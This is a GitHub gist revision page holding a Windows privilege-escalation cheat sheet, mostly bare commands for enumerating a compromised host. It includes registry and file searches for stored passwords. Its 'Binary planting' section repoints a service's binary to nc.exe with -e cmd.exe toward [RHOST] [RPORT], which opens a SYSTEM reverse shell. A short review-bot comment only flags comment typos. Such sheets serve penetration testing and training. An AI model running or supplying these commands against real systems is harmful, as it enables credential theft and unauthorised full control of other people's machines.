
@curiositysec
Forked from sckalath/windows_privesc
Created February 13, 2018 09:02

Revisions

  1. @sckalath sckalath revised this gist Jul 14, 2014. 1 changed file with 82 additions and 1 deletion.
    83 changes: 82 additions & 1 deletion windows_privesc
    @@ -1 +1,82 @@
    TODO: Add stuff.
    // What system are we connected to?
    systeminfo | findstr /B /C:"OS Name" /C:"OS Version"

    // Get the hostname and username (if available)
    hostname
    echo %username%

    // Get users
    net users
    net user [username]

    // Networking stuff
    ipconfig /all

    // Printer?
    route print

    // ARP-arific
    arp -A

    // Active network connections
    netstat -ano

    // Firewall fun (Win XP SP2+ only)
    netsh firewall show state
    netsh firewall show config

    // Scheduled tasks
    schtasks /query /fo LIST /v

    // Running processes to started services
    tasklist /SVC
    net start

    // Driver madness
    DRIVERQUERY

    // WMIC fun (Win 7/8 -- XP requires admin)
    wmic /?
    # Use wmic_info script!

    // WMIC: check patch level
    wmic qfe get Caption,Description,HotFixID,InstalledOn

    // Search pathces for given patch
    wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.."

    // AlwaysInstallElevated fun
    reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated
    reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer\AlwaysInstallElevated

    // Other commands to run to hopefully get what we need
    dir /s *pass* == *cred* == *vnc* == *.config*
    findstr /si password *.xml *.ini *.txt
    reg query HKLM /f password /t REG_SZ /s
    reg query HKCU /f password /t REG_SZ /s

    // Service permissions
    sc query
    sc qc [service_name]

    // Accesschk stuff
    accesschk.exe /accepteula (always do this first!!!!!)
    accesschk.exe -ucqv [service_name] (requires sysinternals accesschk!)
    accesschk.exe -uwcqv "Authenticated Users" * (won't yield anything on Win 8)
    accesschk.exe -ucqv [service_name]

    // Find all weak folder permissions per drive.
    accesschk.exe -uwdqs Users c:\
    accesschk.exe -uwdqs "Authenticated Users" c:\

    // Find all weak file permissions per drive.
    accesschk.exe -uwqs Users c:\*.*
    accesschk.exe -uwqs "Authenticated Users" c:\*.*

    // Binary planting
    sc config [service_name] binpath= "C:\nc.exe -nv [RHOST] [RPORT] -e C:\WINDOWS\System32\cmd.exe"
    sc config [service_name] obj= ".\LocalSystem" password= ""
    sc qc [service_name] (to verify!)
    net start [service_name]

    Mostly all of this taken from http://www.fuzzysecurity.com/tutorials/16.html
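Review bot: the `// Printer?` comment above `route print` misdescribes the command, which prints the IP routing table and has nothing to do with printers; suggest `// Routing table`. Two smaller points in the same hunk: `// Search pathces for given patch` has a typo (`patches`), and `# Use wmic_info script!` refers to a script that is neither linked nor included in the gist and switches to `#` where every other comment uses `//`. Also, in `dir /s *pass* == *cred* == *vnc* == *.config*` the `==` tokens are only argument delimiters to cmd, so the line is equivalent to the four patterns separated by spaces; writing it that way, or adding a comment saying so, would make the intent clearer to readers copying it.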
  2. @sckalath sckalath created this gist Jul 14, 2014.
    1 change: 1 addition & 0 deletions windows_privesc
    @@ -0,0 +1 @@
    TODO: Add stuff.